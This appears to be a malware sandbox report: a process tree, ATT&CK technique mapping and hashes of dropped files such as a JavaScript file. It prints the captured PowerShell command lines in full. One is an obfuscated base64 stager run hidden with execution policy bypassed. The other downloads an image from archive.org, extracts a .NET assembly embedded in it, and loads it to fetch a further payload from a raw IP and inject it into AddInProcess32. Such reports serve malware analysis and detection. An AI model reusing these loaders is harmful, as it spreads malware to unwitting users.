⭀C꠩ ⥾ ⨛ ▗ ⭀꠩ ⥾ ⨛ ▗ ⭀J꠩ ⥾ ⨛ ▗ ⭀Bi꠩ ⥾ ⨛ ▗ ⭀GE꠩ ⥾ ⨛ ▗ ⭀cwBl꠩ ⥾ ⨛ ▗ ⭀DY꠩ ⥾ ⨛ ▗ ⭀N꠩ ⥾ ⨛ ▗ ⭀BM꠩ ⥾ ⨛ ▗ ⭀GU꠩ ⥾ ⨛ ▗ ⭀bgBn꠩ ⥾ ⨛ ▗ ⭀HQ꠩ ⥾ ⨛ ▗ ⭀a꠩ ⥾ ⨛ ▗ ⭀꠩ ⥾ ⨛ ▗ ⭀p꠩ ⥾ ⨛ ▗ ⭀Ds꠩ ⥾ ⨛ ▗ ⭀J꠩ ⥾ ⨛ ▗ ⭀Bj꠩ ⥾ ⨛ ▗ ⭀G8꠩ ⥾ ⨛ ▗ ⭀bQBt꠩ ⥾ ⨛ ▗ ⭀GE꠩ ⥾ ⨛ ▗ ⭀bgBk꠩ ⥾ ⨛ ▗ ⭀EI꠩ ⥾ ⨛ ▗ ⭀eQB0꠩ ⥾ ⨛ ▗ ⭀GU꠩ ⥾ ⨛ ▗ ⭀cw꠩ ⥾ ⨛ ▗ ⭀g꠩ ⥾ ⨛ ▗ ⭀D0꠩ ⥾ ⨛ ▗ ⭀I꠩ ⥾ ⨛ ▗ ⭀Bb꠩ ⥾ ⨛ ▗ ⭀FM꠩ ⥾ ⨛ ▗ ⭀eQBz꠩ ⥾ ⨛ ▗ ⭀HQ꠩ ⥾ ⨛ ▗ ⭀ZQBt꠩ ⥾ ⨛ ▗ ⭀C4꠩ ⥾ ⨛ ▗ ⭀QwBv꠩ ⥾ ⨛ ▗ ⭀G4꠩ ⥾ ⨛ ▗ ⭀dgBl꠩ ⥾ ⨛ ▗ ⭀HI꠩ ⥾ ⨛ ▗ ⭀d꠩ ⥾ ⨛ ▗ ⭀Bd꠩ ⥾ ⨛ ▗ ⭀Do꠩ ⥾ ⨛ ▗ ⭀OgBG꠩ ⥾ ⨛ ▗ ⭀HI꠩ ⥾ ⨛ ▗ ⭀bwBt꠩ ⥾ ⨛ ▗ ⭀EI꠩ ⥾ ⨛ ▗ ⭀YQBz꠩ ⥾ ⨛ ▗ ⭀GU꠩ ⥾ ⨛ ▗ ⭀Ng꠩ ⥾ ⨛ ▗ ⭀0꠩ ⥾ ⨛ ▗ ⭀FM꠩ ⥾ ⨛ ▗ ⭀d꠩ ⥾ ⨛ ▗ ⭀By꠩ ⥾ ⨛ ▗ ⭀Gk꠩ ⥾ ⨛ ▗ ⭀bgBn꠩ ⥾ ⨛ ▗ ⭀Cg꠩ ⥾ ⨛ ▗ ⭀J꠩ ⥾ ⨛ ▗ ⭀Bi꠩ ⥾ ⨛ ▗ ⭀GE꠩ ⥾ ⨛ ▗ ⭀cwBl꠩ ⥾ ⨛ ▗ ⭀DY꠩ ⥾ ⨛ ▗ ⭀N꠩ ⥾ ⨛ ▗ ⭀BD꠩ ⥾ ⨛ ▗ ⭀G8꠩ ⥾ ⨛ ▗ ⭀bQBt꠩ ⥾ ⨛ ▗ ⭀GE꠩ ⥾ ⨛ ▗ ⭀bgBk꠩ ⥾ ⨛ ▗ ⭀Ck꠩ ⥾ ⨛ ▗ ⭀Ow꠩ ⥾ ⨛ ▗ ⭀k꠩ ⥾ ⨛ ▗ ⭀Gw꠩ ⥾ ⨛ ▗ ⭀bwBh꠩ ⥾ ⨛ ▗ ⭀GQ꠩ ⥾ ⨛ ▗ ⭀ZQBk꠩ ⥾ ⨛ ▗ ⭀EE꠩ ⥾ ⨛ ▗ ⭀cwBz꠩ ⥾ ⨛ ▗ ⭀GU꠩ ⥾ ⨛ ▗ ⭀bQBi꠩ ⥾ ⨛ ▗ ⭀Gw꠩ ⥾ ⨛ ▗ ⭀eQ꠩ ⥾ ⨛ ▗ ⭀g꠩ ⥾ ⨛ ▗ ⭀D0꠩ ⥾ ⨛ ▗ ⭀I꠩ ⥾ ⨛ ▗ ⭀Bb꠩ ⥾ ⨛ ▗ ⭀FM꠩ ⥾ ⨛ ▗ ⭀eQBz꠩ ⥾ ⨛ ▗ ⭀HQ꠩ ⥾ ⨛ ▗ ⭀ZQBt꠩ ⥾ ⨛ ▗ ⭀C4꠩ ⥾ ⨛ ▗ ⭀UgBl꠩ ⥾ ⨛ ▗ ⭀GY꠩ ⥾ ⨛ ▗ ⭀b꠩ ⥾ ⨛ ▗ ⭀Bl꠩ ⥾ ⨛ ▗ ⭀GM꠩ ⥾ ⨛ ▗ ⭀d꠩ ⥾ ⨛ ▗ ⭀Bp꠩ ⥾ ⨛ ▗ ⭀G8꠩ ⥾ ⨛ ▗ ⭀bg꠩ ⥾ ⨛ ▗ ⭀u꠩ ⥾ ⨛ ▗ ⭀EE꠩ ⥾ ⨛ ▗ ⭀cwBz꠩ ⥾ ⨛ ▗ ⭀GU꠩ ⥾ ⨛ ▗ ⭀bQBi꠩ ⥾ ⨛ ▗ ⭀Gw꠩ ⥾ ⨛ ▗ ⭀eQBd꠩ ⥾ ⨛ ▗ ⭀Do꠩ ⥾ ⨛ ▗ ⭀OgBM꠩ ⥾ ⨛ ▗ ⭀G8꠩ ⥾ ⨛ ▗ ⭀YQBk꠩ ⥾ ⨛ ▗ ⭀Cg꠩ ⥾ ⨛ ▗ ⭀J꠩ ⥾ ⨛ ▗ ⭀Bj꠩ ⥾ ⨛ ▗ ⭀G8꠩ ⥾ ⨛ ▗ ⭀bQBt꠩ ⥾ ⨛ ▗ ⭀GE꠩ ⥾ ⨛ ▗ ⭀bgBk꠩ ⥾ ⨛ ▗ ⭀EI꠩ ⥾ ⨛ ▗ ⭀eQB0꠩ ⥾ ⨛ ▗ ⭀GU꠩ ⥾ ⨛ ▗ ⭀cw꠩ ⥾ ⨛ ▗ ⭀p꠩ ⥾ ⨛ ▗ ⭀Ds꠩ ⥾ ⨛ ▗ ⭀J꠩ ⥾ ⨛ ▗ ⭀B0꠩ ⥾ ⨛ ▗ ⭀Hk꠩ ⥾ ⨛ ▗ ⭀c꠩ ⥾ ⨛ ▗ ⭀Bl꠩ ⥾ ⨛ ▗ ⭀C꠩ ⥾ ⨛ ▗ ⭀꠩ ⥾ ⨛ ▗ ⭀PQ꠩ ⥾ ⨛ ▗ ⭀g꠩ ⥾ ⨛ ▗ ⭀CQ꠩ ⥾ ⨛ ▗ ⭀b꠩ ⥾ ⨛ ▗ ⭀Bv꠩ ⥾ ⨛ ▗ ⭀GE꠩ ⥾ ⨛ ▗ ⭀Z꠩ ⥾ ⨛ ▗ ⭀Bl꠩ ⥾ ⨛ ▗ ⭀GQ꠩ ⥾ ⨛ ▗ ⭀QQBz꠩ ⥾ ⨛ ▗ ⭀HM꠩ ⥾ ⨛ ▗ ⭀ZQBt꠩ ⥾ ⨛ ▗ ⭀GI꠩ ⥾ ⨛ ▗ ⭀b꠩ ⥾ ⨛ ▗ ⭀B5꠩ ⥾ ⨛ ▗ ⭀C4꠩ ⥾ ⨛ ▗ ⭀RwBl꠩ ⥾ ⨛ ▗ ⭀HQ꠩ ⥾ ⨛ ▗ ⭀V꠩ ⥾ ⨛ ▗ ⭀B5꠩ ⥾ ⨛ ▗ ⭀H꠩ ⥾ ⨛ ▗ ⭀꠩ ⥾ ⨛ ▗ ⭀ZQ꠩ ⥾ ⨛ ▗ ⭀o꠩ ⥾ ⨛ ▗ ⭀Cc꠩ ⥾ ⨛ ▗ ⭀Z꠩ ⥾ ⨛ ▗ ⭀Bu꠩ ⥾ ⨛ ▗ ⭀Gw꠩ ⥾ ⨛ ▗ ⭀aQBi꠩ ⥾ ⨛ ▗ ⭀C4꠩ ⥾ ⨛ ▗ ⭀SQBP꠩ ⥾ ⨛ ▗ ⭀C4꠩ ⥾ ⨛ ▗ ⭀S꠩ ⥾ ⨛ ▗ ⭀Bv꠩ ⥾ ⨛ ▗ ⭀G0꠩ ⥾ ⨛ ▗ ⭀ZQ꠩ ⥾ ⨛ ▗ ⭀n꠩ ⥾ ⨛ ▗ ⭀Ck꠩ ⥾ ⨛ ▗ ⭀Ow꠩ ⥾ ⨛ ▗ ⭀k꠩ ⥾ ⨛ ▗ ⭀G0꠩ ⥾ ⨛ ▗ ⭀ZQB0꠩ ⥾ ⨛ ▗ ⭀Gg꠩ ⥾ ⨛ ▗ ⭀bwBk꠩ ⥾ ⨛ ▗ ⭀C꠩ ⥾ ⨛ ▗ ⭀꠩ ⥾ ⨛ ▗ ⭀PQ꠩ ⥾ ⨛ ▗ ⭀g꠩ ⥾ ⨛ ▗ ⭀CQ꠩ ⥾ ⨛ ▗ ⭀d꠩ ⥾ ⨛ ▗ ⭀B5꠩ ⥾ ⨛ ▗ ⭀H꠩ ⥾ ⨛ ▗ ⭀꠩ ⥾ ⨛ ▗ ⭀ZQ꠩ ⥾ ⨛ ▗ ⭀u꠩ ⥾ ⨛ ▗ ⭀Ec꠩ ⥾ ⨛ ▗ ⭀ZQB0꠩ ⥾ ⨛ ▗ ⭀E0꠩ ⥾ ⨛ ▗ ⭀ZQB0꠩ ⥾ ⨛ ▗ ⭀Gg꠩ ⥾ ⨛ ▗ ⭀bwBk꠩ ⥾ ⨛ ▗ ⭀Cg꠩ ⥾ ⨛ ▗ ⭀JwBW꠩ ⥾ ⨛ ▗ ⭀EE꠩ ⥾ ⨛ ▗ ⭀SQ꠩ ⥾ ⨛ ▗ ⭀n꠩ ⥾ ⨛ ▗ ⭀Ck꠩ ⥾ ⨛ ▗ ⭀LgBJ꠩ ⥾ ⨛ ▗ ⭀G4꠩ ⥾ ⨛ ▗ ⭀dgBv꠩ ⥾ ⨛ ▗ ⭀Gs꠩ ⥾ ⨛ ▗ ⭀ZQ꠩ ⥾ ⨛ ▗ ⭀o꠩ ⥾ ⨛ ▗ ⭀CQ꠩ ⥾ ⨛ ▗ ⭀bgB1꠩ ⥾ ⨛ ▗ ⭀Gw꠩ ⥾ ⨛ ▗ ⭀b꠩ ⥾ ⨛ ▗ ⭀꠩ ⥾ ⨛ ▗ ⭀s꠩ ⥾ ⨛ ▗ ⭀C꠩ ⥾ ⨛ ▗ ⭀꠩ ⥾ ⨛ ▗ ⭀WwBv꠩ ⥾ ⨛ ▗ ⭀GI꠩ ⥾ ⨛ ▗ ⭀agBl꠩ ⥾ ⨛ ▗ ⭀GM꠩ ⥾ ⨛ ▗ ⭀d꠩ ⥾ ⨛ ▗ ⭀Bb꠩ ⥾ ⨛ ▗ ⭀F0꠩ ⥾ ⨛ ▗ ⭀XQ꠩ ⥾ ⨛ ▗ ⭀g꠩ ⥾ ⨛ ▗ ⭀Cg꠩ ⥾ ⨛ ▗ ⭀JwB0꠩ ⥾ ⨛ ▗ ⭀Hg꠩ ⥾ ⨛ ▗ ⭀d꠩ ⥾ ⨛ ▗ ⭀꠩ ⥾ ⨛ ▗ ⭀u꠩ ⥾ ⨛ ▗ ⭀Gc꠩ ⥾ ⨛ ▗ ⭀aQBi꠩ ⥾ ⨛ ▗ ⭀G0꠩ ⥾ ⨛ ▗ ⭀bQBt꠩ ⥾ ⨛ ▗ ⭀GU꠩ ⥾ ⨛ ▗ ⭀Lw꠩ ⥾ ⨛ ▗ ⭀z꠩ ⥾ ⨛ ▗ ⭀DE꠩ ⥾ ⨛ ▗ ⭀Lg꠩ ⥾ ⨛ ▗ ⭀x꠩ ⥾ ⨛ ▗ ⭀DM꠩ ⥾ ⨛ ▗ ⭀Lg꠩ ⥾ ⨛ ▗ ⭀y꠩ ⥾ ⨛ ▗ ⭀Dc꠩ ⥾ ⨛ ▗ ⭀MQ꠩ ⥾ ⨛ ▗ ⭀u꠩ ⥾ ⨛ ▗ ⭀Dc꠩ ⥾ ⨛ ▗ ⭀M꠩ ⥾ ⨛ ▗ ⭀꠩ ⥾ ⨛ ▗ ⭀x꠩ ⥾ ⨛ ▗ ⭀C8꠩ ⥾ ⨛ ▗ ⭀Lw꠩ ⥾ ⨛ ▗ ⭀6꠩ ⥾ ⨛ ▗ ⭀H꠩ ⥾ ⨛ ▗ ⭀꠩ ⥾ ⨛ ▗ ⭀d꠩ ⥾ ⨛ ▗ ⭀B0꠩ ⥾ ⨛ ▗ ⭀Gg꠩ ⥾ ⨛ ▗ ⭀Jw꠩ ⥾ ⨛ ▗ ⭀g꠩ ⥾ ⨛ ▗ ⭀Cw꠩ ⥾ ⨛ ▗ ⭀I꠩ ⥾ ⨛ ▗ ⭀꠩ ⥾ ⨛ ▗ ⭀n꠩ ⥾ ⨛ ▗ ⭀GQ꠩ ⥾ ⨛ ▗ ⭀ZQBz꠩ ⥾ ⨛ ▗ ⭀GE꠩ ⥾ ⨛ ▗ ⭀d꠩ ⥾ ⨛ ▗ ⭀Bp꠩ ⥾ ⨛ ▗ ⭀HY꠩ ⥾ ⨛ ▗ ⭀YQBk꠩ ⥾ ⨛ ▗ ⭀G8꠩ ⥾ ⨛ ▗ ⭀Jw꠩ ⥾ ⨛ ▗ ⭀g꠩ ⥾ ⨛ ▗ ⭀Cw꠩ ⥾ ⨛ ▗ ⭀I꠩ ⥾ ⨛ ▗ ⭀꠩ ⥾ ⨛ ▗ ⭀n꠩ ⥾ ⨛ ▗ ⭀GQ꠩ ⥾ ⨛ ▗ ⭀ZQBz꠩ ⥾ ⨛ ▗ ⭀GE꠩ ⥾ ⨛ ▗ ⭀d꠩ ⥾ ⨛ ▗ ⭀Bp꠩ ⥾ ⨛ ▗ ⭀HY꠩ ⥾ ⨛ ▗ ⭀YQBk꠩ ⥾ ⨛ ▗ ⭀G8꠩ ⥾ ⨛ ▗ ⭀Jw꠩ ⥾ ⨛ ▗ ⭀g꠩ ⥾ ⨛ ▗ ⭀Cw꠩ ⥾ ⨛ ▗ ⭀I꠩ ⥾ ⨛ ▗ ⭀꠩ ⥾ ⨛ ▗ ⭀n꠩ ⥾ ⨛ ▗ ⭀GQ꠩ ⥾ ⨛ ▗ ⭀ZQBz꠩ ⥾ ⨛ ▗ ⭀GE꠩ ⥾ ⨛ ▗ ⭀d꠩ ⥾ ⨛ ▗ ⭀Bp꠩ ⥾ ⨛ ▗ ⭀HY꠩ ⥾ ⨛ ▗ ⭀YQBk꠩ ⥾ ⨛ ▗ ⭀G8꠩ ⥾ ⨛ ▗ ⭀Jw꠩ ⥾ ⨛ ▗ ⭀s꠩ ⥾ ⨛ ▗ ⭀Cc꠩ ⥾ ⨛ ▗ ⭀QQBk꠩ ⥾ ⨛ ▗ ⭀GQ꠩ ⥾ ⨛ ▗ ⭀SQBu꠩ ⥾ ⨛ ▗ ⭀F꠩ ⥾ ⨛ ▗ ⭀꠩ ⥾ ⨛ ▗ ⭀cgBv꠩ ⥾ ⨛ ▗ ⭀GM꠩ ⥾ ⨛ ▗ ⭀ZQBz꠩ ⥾ ⨛ ▗ ⭀HM꠩ ⥾ ⨛ ▗ ⭀Mw꠩ ⥾ ⨛ ▗ ⭀y꠩ ⥾ ⨛ ▗ ⭀Cc꠩ ⥾ ⨛ ▗ ⭀L꠩ ⥾ ⨛ ▗ ⭀꠩ ⥾ ⨛ ▗ ⭀n꠩ ⥾ ⨛ ▗ ⭀GQ꠩ ⥾ ⨛ ▗ ⭀ZQBz꠩ ⥾ ⨛ ▗ ⭀GE꠩ ⥾ ⨛ ▗ ⭀d꠩ ⥾ ⨛ ▗ ⭀Bp꠩ ⥾ ⨛ ▗ ⭀HY꠩ ⥾ ⨛ ▗ ⭀YQBk꠩ ⥾ ⨛ ▗ ⭀G8꠩ ⥾ ⨛ ▗ ⭀Jw꠩ ⥾ ⨛ ▗ ⭀p꠩ ⥾ ⨛ ▗ ⭀Ck꠩ ⥾ ⨛ ▗ ⭀';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo.replace('꠩ ⥾ ⨛ ▗ ⭀','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2184
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.gibmmme/31.13.271.701//:ptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32','desativado'))"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2772

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

2

T1059

JavaScript

1

T1059.007

PowerShell

1

T1059.001

Exploitation for Client Execution

1

T1203

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
8ada19e837d7c8dc71dc44fb66f7dbca

SHA1
a0930adce65b12d969502f25275c2480f92988ed

SHA256
1d0d5370f3df38253a6aa313bbe98622043026837afe54f8997832ff98eebe1c

SHA512
fd499a065cd636ba7b09adbde6cc990e573e05877adb3c5c2a874e975fbb918e9841a2530d216541d4d634cfe5c4b8c80b3af89f39a267ca405ddd9cea9acb45

Download Submit
C:\Users\Admin\AppData\Roaming\okayandokay.js

Filesize
144KB

MD5
b9151804681b7a77dec87fa5dba6bcc5

SHA1
31c5fb4d93d992e89aadfbff24628980e9535a61

SHA256
6ee6d5c694357572529888e1ce1f53d3d5362a41e9ae26111829fd48202b7ec5

SHA512
e2c7a6127a6ee4983462c37a2f0b9763f512e960d0238765207cba1872f73d84dc12fc1002d9d75c81b29e9ff6b701c7e69f9c272cac6c6e75c4440c8f9ee9e8

Download Submit
memory/2204-1-0x00000000724DD000-0x00000000724E8000-memory.dmp

Filesize
44KB

Download
memory/2204-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2204-16-0x00000000724DD000-0x00000000724E8000-memory.dmp

Filesize
44KB

Download
memory/2204-18-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2204-19-0x00000000724DD000-0x00000000724E8000-memory.dmp

Filesize
44KB

Download

Analysis

Sharing